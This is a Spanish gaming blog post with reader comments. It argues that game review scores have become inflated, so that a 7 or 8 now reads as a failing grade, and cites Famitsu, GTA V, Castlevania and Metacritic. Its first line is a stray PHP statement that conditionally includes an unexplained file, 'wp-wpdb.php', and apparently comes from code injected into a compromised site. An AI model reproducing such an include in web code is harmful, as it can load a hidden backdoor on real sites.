if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Las notas en los videojuegos, o la historia de cómo los notables se convirtieron en suspensos – La Fortaleza de LeChuck

Las notas en los videojuegos, o la historia de cómo los notables se convirtieron en suspensos

Desde que hemos entrado prematuramente en la nueva generación me da por echar la vista atrás y recordar la vieja (en la que aún estoy inmersa) y me quedo atónita ante el alto índice de dieces recibidos en la mayoría de juegos AAA. Echando un vistazo por ahí, parece que no son solo imaginaciones mías, y encontré una gráfica del aumento de sobresalientes de Famitsu, ese reputado medio japonés, que cada año incrementa considerablemente sus puntuaciones perfectas. Mirad este gráfico:

famitsu-perfect-scores-2011

Como podéis observar, desde 2008, los 40 (la nota perfecta para el medio) se han disparado bastante. ¿Realmente los juegos lanzados antes de ese año no eran merecedores del sobresaliente? ¿Las mejoras tecnológicas de la industria justifican la nota perfecta? ¿O son las presiones de las compañías las que empujan a los medios a este acentuado incremento?

Últimamente los llamados medios especializados en videojuegos han convertido sus publicaciones en una competición de a ver quien saca la review antes, con más paginas y mayor nota. Muchos de esos análisis parecen plantillas con mucha paja y aplicables a otros juegos del mismo género. Wikis sin un ápice de emoción donde no se llega a conocer realmente la opinión del redactor.  Además, en ocasiones la argumentación no se corresponde con la puntuación. Por otro lado, estos análisis a veces se efectúan con un par de horas de juego en títulos que requieren semanas de exploración.

El hype derivado de un marketing agresivo, sumado a la fama de una compañía, tiene una gran influencia a la hora de realizar un análisis. Un claro ejemplo fue GTA V, el galardonado como juego del año 2013. La saga más malota de Rockstar, y su compañía, caen bien, hasta el punto de que seguramente muchos le tenían guardado el 10 con tan solo ver los primeros videos.

Sobre GTA V me dijeron una vez que el 10 no es por perfección, sino porque representaba lo más alto que hemos llegado en la pasada generación. Bien, GTA V tuvo dieces a diestro y siniestro, GTA IV también. Mnn algo no me cuadra. No tengo nada en contra de la saga, me lo paso muy bien destrozando cosas y apaleando gente, vamos, ¡que me encanta! pero para mí la historia es fundamental y sinceramente GTA, de momento, queda lejos de tener una excelente trama.

GTA V selfie
GTA V lo peta

Ahora por favor, decidme: ¿Desde cuándo un 7 u 8 se ha convertido en un suspenso? Parece ser que todo es causa del auge de webs de videojuegos y el mantener contentas a las compañías. Algo así como: «si te portas mal no hay juegos, o publicidad». Algunos redactores de medios bromean diciendo que reciben maletines cuando se les acusa de inflar notas, y obviamente los tiros no van por ahí. Me viene a la cabeza el día que se abrió la veda con los análisis de Bioshock: Infinite y en una web aparecía en portada con un 10 gigante y un bonito fondo publicitario de dicho juego. Curioso, ¿no?

No sé si recordaréis cierta polémica de hace unos años con una gran compañía y una web española que criticaba diversas cuestiones sobre sus juegos. Se armó la marimorena y la gran compañía puso el grito en el cielo diciendo que hasta aquí habíamos llegado, enviaron un e-mail a la web con una lista de enlaces no gratos y la cancelación de una invitación a un evento. El asunto trascendió e incluso otros medios se pusieron del lado de la web en cuestión y la gran compañía tuvo que recular y disculparse.

EA
Tenemos imágenes del miembro de la compañía que envió el e-mail

El último caso sonado ha sido el de las polémicas puntuaciones de Castlevania: Lords of Shadow 2, que como si de una enfermedad contagiosa se tratara, las notas por debajo del 8 se extendieron como la pólvora, (lo que se considera suspenso, como sabéis) lo que llevó incluso a un supuesto miembro anónimo del equipo a contar los trapos sucios en una web española. Y no es que el  8 o 7 sea mala nota, sino que los medios han hecho parecer que así sea. Cuando se reparten dieces como churros, y a ti no te dan, es normal enfadarse y reclamar el tuyo. Fue así como Enric Álvarez comentó en una entrevista días después que los medios habían sido injustos por cascarle un 6 o 7.  También trataba el tema de la influencia de los medios extranjeros a la hora de puntuar, y quizá en este punto es donde tiene bastante razón. Muchas reviews aparecen antes en publicaciones de EE.UU o UK que en nuestro país, y cuando éstas puntúan por debajo de 8, los medios de aquí también se atreven. Algo así como: «Si esos gigantes lo han hecho, yo también puedo y no me dirán nada». Tan solo hay que comparar las puntuaciones de algunos juegos de lanzamiento de PS4 y Xbox One de aquí con las de fuera.

Siguiendo con el caso del Castlevania: Lords of Shadow 2, veamos lo que opinan los jugadores, y para ello que mejor que visitar la web de Metacritic, donde podemos ver la comparativa entre las webs especializadas y los usuarios. Echemos un vistazo:

castlevania-LOS2

¡Rayos! ¿Pocas horas de juego de algunos redactores? Quién sabe. Esta tremenda diferencia no es fortuita y se da en muchos juegos, por ejemplo, uno que me pareció un auténtico desastre: Dragon Age 2. ¿Qué opinarán en Metacritic? Veamos:

dragon-age-ii

¡Toma ya! aquí la diferencia es bastante notable. En este caso como he jugado puedo opinar y me inclino por la puntuación de los usuarios. Podéis seguir buscando, seguro que os echáis unas risas.

¿Y qué sucedía en el pasado? ¿Es que los juegos de antes eran tan malos que no abundaban los dieces o es que la prensa era más seria? No recuerdo ni un solo 10 en los tropecientos años que estuvimos comprando la Micromanía. Voy a repasar algunas de las notas de los que considero los mejores juegos de todos los tiempos:

  • La Abadía del Crimen: 9
  • Maniac Mansion: 9
  • The Secret of Monkey Island: 9
  • Day of the Tentacle: 94 (En esta época comenzaron a puntuar sobre 100)
  • Doom: 93

Quizá el que más se aproximó al 10 fue Alone in the Dark con esta afirmación: «Puede que sea el mejor juego de la historia». Obtuvo la máxima puntuación en todo menos en dificultad, pero en aquel periodo creo recordar que no hacían media. Desde finales de los 80, hasta prácticamente principios del siglo XXI, la Micromanía fue un referente para mí y mi hermano en cuanto a confianza en sus análisis y valoraciones. Nunca nos arrepentimos de nuestras compras al fiarnos de aquellos redactores. ¡Aaaah! ¡Qué tiempos aquellos!

Pero en fin, ¡ya sabemos como funciona el mercado actual! Los juegos que venden más son los que reciben la nota más alta, pero tampoco es conveniente mentir a los jugadores, ya que si un jugador compra un título que desde una web pintan como la leche y sale decepcionado, pierden ambos lados, y ese jugador desconfiará de esa web y compañía.

Los medios especializados en videojuegos deberían educar al público y hacerles entender que un 7 no es una mala nota. Los periodistas y colaboradores no son esclavos de las compañías, y aplicar la crítica constructiva y poner suspensos sin que les tiemble la mano ayuda a que el sector no se acomode, y a ellos a recuperar el prestigio perdido. Porque un triple A no es sinónimo de calidad por mucha pasta invertida que haya, ni un indie es basura por lo contrario. Los medios si se unen tienen fuerza, y el ejemplo de la gran compañía y aquella web acusada de perjudicarlos es el vivo ejemplo que no hay que olvidar.

konami
Luego salen malcriados

Aunque al final lo mejor viene siendo lo de siempre, preguntar a los amigos que les ha parecido ese juego. Ellos te conocen, saben lo que te gusta y son los mejores y más imparciales.

Por lo que a este humilde blog respecta, seguiremos opinando libremente sobre juegos de todas las épocas desde nuestra experiencia. Y si algún pobre infeliz acaba aquí y ve un 8, 7, 6 o suspenso, os aseguramos que se lo tendrá bien merecido y argumentaremos como buenamente podamos el porqué.

Y vosotros, ¿qué opináis sobre esto?

Publicada el
Categorizado como Opinión

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

22 comentarios

  1. Yo leía la revista Gamelive PC y me encantaban los análisis. Era común ver notas de 3,4 o 5 a juegos que al dar vuelta de pagina veías la publicidad del mismo. Lo que indicaba claramente que no se dejaban llevar por las compañías. La Micromania en la tercera generación dicen que se había vendido, pero no opino por que yo no la leía. Pero actualmente ya no me fío de los análisis en la web, a pesar de que leo algunos. A través de youtube podes ver como es y darte una idea.

    1. Qué tiempos aquellos! supongo que también las pocas revistas de videojuegos hacia que las compañías fueran comedidas. En la tercera época de la Micromanía no me pareció que se vendieran, la verdad, todo lo que pintaban como juegazos los disfrutaba mucho. Yo hago un poco como tú, miro videos de youtube y un poco de como comienza el gameplay para hacerme una idea. Algo bueno tiene que tener el auge de youtubers de videojuegos 🙂

      1. Te recomiendo ver a Slobulus en Youtube, si no lo conoces. Tiene dos canales, uno se llama justamente Slobulus que habla de los juegos retro de todas las consolas. Y el otro canal se llama Generación Actual donde hace análisis de juegos nuevos incluyendo los indies. Sin duda, de los que conozco, es el mejor youtuber español en el tema de videojuegos.

  2. Pues precisamente el problema viene de muuuuuuy atrás, de la prensa escrita de antes de que se estandarizara la prensa o pseudo prensa internauta. Tengo un montón de revistas que básicamente ponen a parir un juego y su nota final es un 7.

    También está el problema de los juegos que ni siquiera son analizados y se puntuan por su nombre. Así, recuerdo un caso muy llamativo en cierta web de popularidad mundial que le cascaba un 9 o 9’5 al primer Assassin’s Creed en cuanto salió. Meses después (y tras haber sido jugado por medio mundo que comprobó lo repetitivo que era), salió al versión para PC, cuyo análisis también se realizo en el mismo medio… con un 7 de nota.

    De todas formas la tendencia creo que está cambiando. La gente se dio cuenta hace tiempo de ese tipo de cosas, y la «prensa» se está dando cuenta de que la gente se ha dado cuenta (tres tristes tigres comían trigo en un trigal). Si a todo esto le sumamos la inmensa cantidad de blogs que hay que hacen análisis más justos y desinteresados (yo por ejemplo rara vez llego al 8) el resultado final es que, de alguna manera, todo se está equilibrando.

    1. ¿Te refieres aquel boom de prensa escrita que comenzaron a salir revistas como churros? cuando habían poquitas creo que no se daba este problema. Sí, lo de tener preparado un 10 para el juego de X compañía creo que es un habitual, lo que cuentas canta demasiado que no se como no les daba vergüenza. Con los exclusivos ya es un cachondeo. Adoro la saga Halo, pero Halo 4 fue bastante decepcionante y le cascaron 9,5 o 10. ¡Quién osaría ponerle menos de un 9 a la saga estrella de Microsoft!

      Les está costando pero espero que reflexionen por su propio bien, la gente no es tonta, aunque no te extrañe que casquen dieces tan solo por el morbo de la gente por ver la nota y así conseguir visitas.

      1. Precisamente deberían darse cuenta que hay mucho más morbo cuando dan un 10 cada año que cuando dan cien! Recuerdo precisamente el caso de Famitsu cuando cascaron un 10 en 1998 como se ve en el gráfico (bueno, un 99 creo o un 100 xD) y hacer lo posible por echar mano a esa revista y verlo. Ahora me dicen que Famitsu ha dado el máximo de nota y.. «pues vale».

  3. Completamente de acuerdo. Si la mayoría de revistas no estuvieran compradas, las desarrolladoras se pondrían las pilas.
    En mi humilde opinión el 90% de los juegos actuales no llegaría ni al 8 o incluso ni al 7 y lo mismo me quedo corto.
    Mucho AAA, poco amor y peor calidad…

    1. Está claro, si te dicen que todo lo que haces es sobresaliente seguirás haciendo lo mismo. Un grave error que hacen que últimamente salga juegos que dejan que desear y llenos de bugs y glitches.
      Muy de acuerdo con ese 90%, y a veces pienso: «joer, la gente debe pensar que lo estoy suspendiendo» Precisamente Guybrush le puso a The Last of Us un 7,5 creo recordar y alguien comentó que por qué tan mala nota (al cambiar el diseño del blog se habrá perdido el comentario)
      Muy de acuerdo con tu última afirmación, se ha perdido ese cariño por los videojuegos.

  4. Interesante reflexión. Mientras leía el artículo estaba pensando que realmente a día de hoy un 7 es una nota mala. Yo mismo estuve a punto de cancelar mi pedido de Thief por las críticas que le cayeron hasta que al final pensé que no iba a dejar que los medios eligiesen por mí. Ha cambiado muchísimo el tema de la prensa de videojuegos desde los tiempos de la Micromania y ojalá se recuperase parte de aquel espíritu.

    Me da mucha rabia cuando un medio saca una review sin terminar el juego. Para opinar tienes que terminarlo, el final también es parte del juego. Hace poco empecé yo mi propio blog y voy a tomarme muy en serio esta premisa y he optado desde el principio por no dar notas.

    1. Muy buena decisión al comprar Thief, que alguien que ha jugado un par de horas no decida por ti. Ojalá volviera esa época, pero la masificación de webs de videojuegos y el acercamiento furtivo a PR de compañías para conseguir favores están a la orden del día.

      Exacto, no se puede valorar un RPG, por ejemplo, jugando 2 horas. Verás tu los análisis del Dark Souls 2! Mucha suerte con tu blog, lo seguiré de cerca 🙂

  5. Muy buen análisis, aunque creo que dejas pasar el por qué del 7=DESASTRE. La realidad, y aunque luego se opere a partir de ella, es que todos saben que el 10 es inventado. Y que el real está dos o incluso tres por debajo. Extendiendo esta «correción política» interesada entre críticos y desarrolladora, cuando aparece un 7 significa (en el inconsciente colectivo) que los medios apenas pueden mantener la credibilidad sin hundir un juego. Recuerdo pensar esto con las notas del RYSE. Y aunque se que es un prejuicio, estoy convencido de que mucho han hecho para que se instale.

    Del mismo modo que el hype y hater el son dos caras de la misma moneda, una reacción natural del 2º a lo generalmente prefabricado del 1º.

    1. ANEXO/DESCARGO: Ya que estoy, dejo aquí mi enorme disconformidad con el 10 absoluto a Skyrim, un juego notable en muchos aspectos (y muy bien considerado por gente que respeto mucho), pero que tiene una física de impactos cuerpo a cuerpo horrenda. Juegos muchos menores en graficos (y demás) como el Dragon’s Dogma le da mil vueltas. Estoy convencido de que el problema es la posibilidad de elegir entre 1º y 3º persona, lo que en mi opinión establece problemas de distancias y direccionalidad que el juego decide pasar por alto. OSEA: cuando das espadazos a una persona, no ves en ningún momento el impacto en su cuerpo.

      Gracias por poder sacarme esto de adentro, jajaja.

      1. Sí, 7 es el apocalisis casi. Tenía por ahí un divertido gif que trataba ese tema, lo tengo que buscar. Ese mal se ha extendido a la prensa mundial y muchos jugadores se han dado cuenta, hay mil memes con IGN y su forma de inflar las notas.
        Muy de acuerdo con ese Skyrim, la gente creo que solo ha puntuado el mundo abierto y que tiene 93939 misiones. A mí es algo que particularmente me agobia y me atrae por partes iguales. Sobre lo que dices de la 1º persona opino igual, no hay forma de conocer la distancia entre un enemigo y tú, y si cambias a 3ª persona, como no ha sido ideado para ello, es ortopédico. Los RPG para mí siempre en tercera persona o vista cenital.

  6. Completo analisis sobre uno de los «cancer» de la industria y una demostracion del por que la prensa de los videojuegos (si es que prensa se le puede llamar muchas veces) no esta a la altura de sus contemporaneos en el cine, esa moda excluyente y sumamente estupida de glorificar el 8+ y estigmatizar el -7 se ha convertido en una moda que da pie a malinterpretaciones por parte de los lectores y que, a largo plazo (como vemos con sagas style CoD) Tambien malinterpretan las compañias a la hora de continuar con contenido deficiente y mediocre.

    Por mi parte, incluso le he dado oportunidad a juegos con 5 en metascore y me he llevado sorpresas (o lo contrario con videojuegos de 8+ como viene siendo de costumbre de unos años para aqui) Sobre si el 10 es una nota de perfeccion… el 10 es una nota de perfeccion subjetiva, en mi blog solo he puntuado a dos videjuegos con un 10 pero extrapolando lo mas subjetivo a la objetividad y defendiendo segun mis gustos. Solo me he arrepentido de darle un 8 a un videojuego como correcion personal.

    Por esa razon, yo he preferido puntuar con estrellas, pero 3 en vez de 5. ¿La razon? Yo puntuo de la siguiente manera:

    1 Estrella: No recomendable
    2 Estrellas: Recomendable con matices
    3 Estrellas: Completamente recomendable, excepcionalmente excelente

    Por ende, al lector no le queda de otra que leer el por que lo recomiendo con esa puntuacion, asi le quitamos sentido a las notas y prima el contenido del texto.

    Nuevamente, un gran analisis, mi primer comentario por la web (aunque la leo atento) y espero el primero de muchos, un buen trabajo.

    1. Si los grandes medios no hacen nada, tendremos que seguir dándoles toques de atención desde pequeños blogs, esperando que al menos los jugadores que tropiecen por estos lares abran los ojos.
      Me parece una buena decisión dar la oportunidad a esos juegos que quizá han sido injustamente puntuados por la prensa y favorablemente por un usuario de Metacritic, por ejemplo.

      Si el 10 lo justificas y expresas tu opinión, y no es una gigante nota de prensa o plantilla de una wiki, me parece totalmente correcto. Sobre la estrellas me parece una buena forma, así la gente se molestará más en leer y no irá corriendo a mirar la nota y opinar que es justo/injusto. Nosotros estamos confeccionando el sistema de puntuación, aunque también ronda por nuestra cabeza no puntuar y hacer como Kotaku y poner «Recomendado Sí/No»
      Muchas gracias por tu opinión :).

  7. Desgraciadamente esto pasa no sólo en los videojuegos, sino en todas partes. Por ejemplo en el cine, los grandes medios le dan notas muy altas a prácticamente todas las películas que aspiran a ser taquilleras, y luego resultan ser una verdadera basura. Las críticas no son críticas sino propaganda camuflada como tal, cosa que sinceramente lo considero rastrero porque en muchas ocasiones se engaña a la gente.

    Por eso yo prefiero fiarme de blogs (y consulto varios para contrastar), son más independientes y sinceros y no suelen intentar venderte el producto, sino que opinan (o en el caso de videojuegos, ver gameplays).

  8. Yo recuerdo cuando HobbyConsolas no era un catalogo de publicidad,los redactores tenian seudonimos chulos y en un recuadro te daban su opinion,se puntuaba objetivamente en otro cuadro aparte y aun asi muchas veces te advertian que no habian jugado mucho y que era bastante probable que el juego fuese ganando con las horas
    A dia de hoy cualquier medio «profesional» esta comprado(o vendido segun gustos)y lo unico de lo que te puedes fiar es de blogs «pequeños» o de gente conocida,vamos,la gente que esta metida en el mundillo porque les apasionan los videojuegos,no porque busquen dinero
    Las puntuaciones a dia de hoy son absurdas
    Las grandes sagas estan requemadas y se han convertido en juegos con mas minutos de videos que de juego en si,yo creo que Kojima por ejemplo podria hacer unas pelis muy entretenidas,pero para que las va a hacer si te pueden cobrar SESENTA euros por una peli en la que juegas 5 minutos?
    Y les caen dieces a paladas,bien porque la compañia paga por ello,porque presianan a los medios,porque los medios no se atreven a juzgar ciertos titulos objetivamente para no recibir las iras de los fans de la saga,por lo que sea
    Tomemos el ejemplo de los ultimos Final Fantasy
    Que ha sido de esa saga?Realmente se acercan los ultimos titulos a los de su epoca dorada ni que sea remotamente?Pues les dan notas altisimas igual
    Creo que en parte es por la actual moda «gamer»,donde priman mas los graficos que cualquier otra cosa
    Aunque FFVI le de un octillon de vueltas a los ultimos titulos de la saga,estoy convencido de que en cualquier publicacion si los comparaen a dia de hoy ganaria el mas nuevo,y seria simplemente por graficos,porque eso es lo que vende actualmente,graficazos
    En fin,me voy por las ramas XD
    Lo dicho,ya solo te puedes fiar de blogs y conocidos,lo demas,mierda

  9. Creo que las puntuaciones son una forma arcaica de juzgar los juegos y demasiadas personas ven la puntuación final y nunca profundizan en el análisis. El análisis en si mismo es lo importante, y no un número.

    Tener un sistema binario (recomendado o no) es una mejor forma para solucionar muchos problemas que siempre han tenido y tiene las puntuaciones en medios grandes, pequeños o de usuarios.

    Por ejemplo, las opiniones de los usuarios de Metacritic no son útiles en general, se publican comentarios de 0 o 10 solo por tratar de mover la puntuación media, ya que no pueden soportar que esa media no coincidan con su propia opinión.
    No puede ser que en Company of Heroes 2 http://www.metacritic.com/game/pc/company-of-heroes-2 reciban malas puntuaciones porque los rusos piensan que la representación de ellos en la guerra del juego es de mal gusto (ojo, totalmente respetable) pero en un análisis o puntuación de un juego no es lugar para quejarse de eso. Estoy seguro que la mayoría de esas clasificaciones son o bien de personas que no han jugado el juego o cuentas duplicadas.

    Por eso también es importante conocer si la persona que analiza el juego (sea profesional o no) realmente dispone del juego y cuantas horas ha jugado. Incluso con logros de progresión.
    De que sirve un análisis de Skyrim con 2 horas jugadas si no es lo suficiente tiempo para hacer un análisis adecuado por el tipo de profundidad que tiene el título.

    Además, los desarrolladores deberían de poder responder directamente a los análisis. Esto daría una linea directa de los desarrolladores a las personas que analizan los juegos. Que si no le gustan algo del análisis que lo hagan publico. (cuantas conversaciones privadas habrán derivado a una u otra nota…)

    Al final todos tendremos una lista de amigos con los que jugamos y confiamos por tener los mismos gustos, unido al sistema de análisis que he descrito antes (que alguno le resultará familiar al Steam Reviews) no necesitaremos más a los medios como Metacritic, Famitsu, etc… y como no espabilen tendrán un gran problema porque aunque parezca mentira, ya hay mucha gente que no confía en las puntuaciones de profesionales y menos aún de los usuarios.

    Mi humilde opinión es que este blog debería de adoptar este sistema binario (es el juego recomendable o no).

    Saludos.

  10. Toda la razón, antes uno veía que un juego tenia un 75 o un 80 y era considerado bueno, al menos en su genero.

    Lo 85 o 90 estaban reservados para autenticas joyas. Aquellos juegos que rompían con todo lo establecido y se convertían clásicos instantáneos, como Doom o Day of the Tentacle.

    Hoy en día parece que si un juego tiene menos de 90 es una basura. Cuando recuerdo que Hobby Consola un juego de 75 lo consideraba bueno en su genero.

    Madre mía, si en el colegio fuera igual, no hubiese aprobado ni una. Hoy parece que si no es triple AAA el juego es mierda.

    Hay juegos muy buenos como X-Com que para mi no se merece mas de un 85 pero es una maravilla de juego.

  11. Llego tarde, pero lo he leído todo,
    ¡ah si, hola! No sé porqué lo he leído pues opino igual y poco me
    aportará, pero los comentarios me dan esperanza. Muchos hablan sobre
    el cambio de tendencias del público, pero personalmente aún tengo
    un amigo de los de:

    «Los blogs, el reino de la anarquía
    donde cada uno dice lo que quiere»

    En el sentido de
    que darán mala nota porque así molan más. Es curioso como por el
    contrario no llega a la conclusión de la nota comprada en la web de
    turno. Solo eso nada más xD. Una de esas reflexiones que necesitas
    escribir.

  12. No hay duda de que ver una nota superior al 85 en cualquier medio serio (no Meristation, donde Sony es Dios y cualquier otra compañía recibe palos, sino más bien recopiladores de reseñas como GameRankings o Metacritic) anima a ver un juego con buenos ojos y te lleva a considerar su compra. Es natural, no lo pruebas hasta que lo tienes y para asegurar que no tiras el dinero lo lógico es ir a por lo mejor valorado.

    Aun así es cierto que hay tendencia a ponerles nueves a los buenos juegos y cualquier nota que esté por debajo del 8… es que estamos ante un título mediocre. No lo digo yo, me baso en lo que veo en los medios.

    Y no ahora, sino que ya en tiempos de los 16 bits, cuando compraba la Hobby Consolas, había los juegos que superaban el 90, que tenían página entera o hasta dos páginas, y el que se llevaba un 80 o menos se quedaba en media página con suerte. Se puntuaba altísimo, con lo que un 75 te hacía arrugar la frente y un juego de, pongamos, 69, era directamente malo. Pero claro, todo son opiniones y por ejemplo el Sega Touring Car de Saturn se llevó un 95 y yo lo devolví el mismo día que lo compré, de lo malo que me pareció. Lo volví a probar años después al pillarlo de segunda mano, para darle otra oportunidad, y me lo he vendido porque no había manera.

    Total, que cada uno puede percibir un mismo juego de distinta manera, pero sin duda los medios especializados influyen y no hay vuelta de hoja. El dinero es limitado, los precios altos (si compramos en España, claro, ya que en el Reino Unido no) y no hay demasiado margen para el error.

Dejar un comentario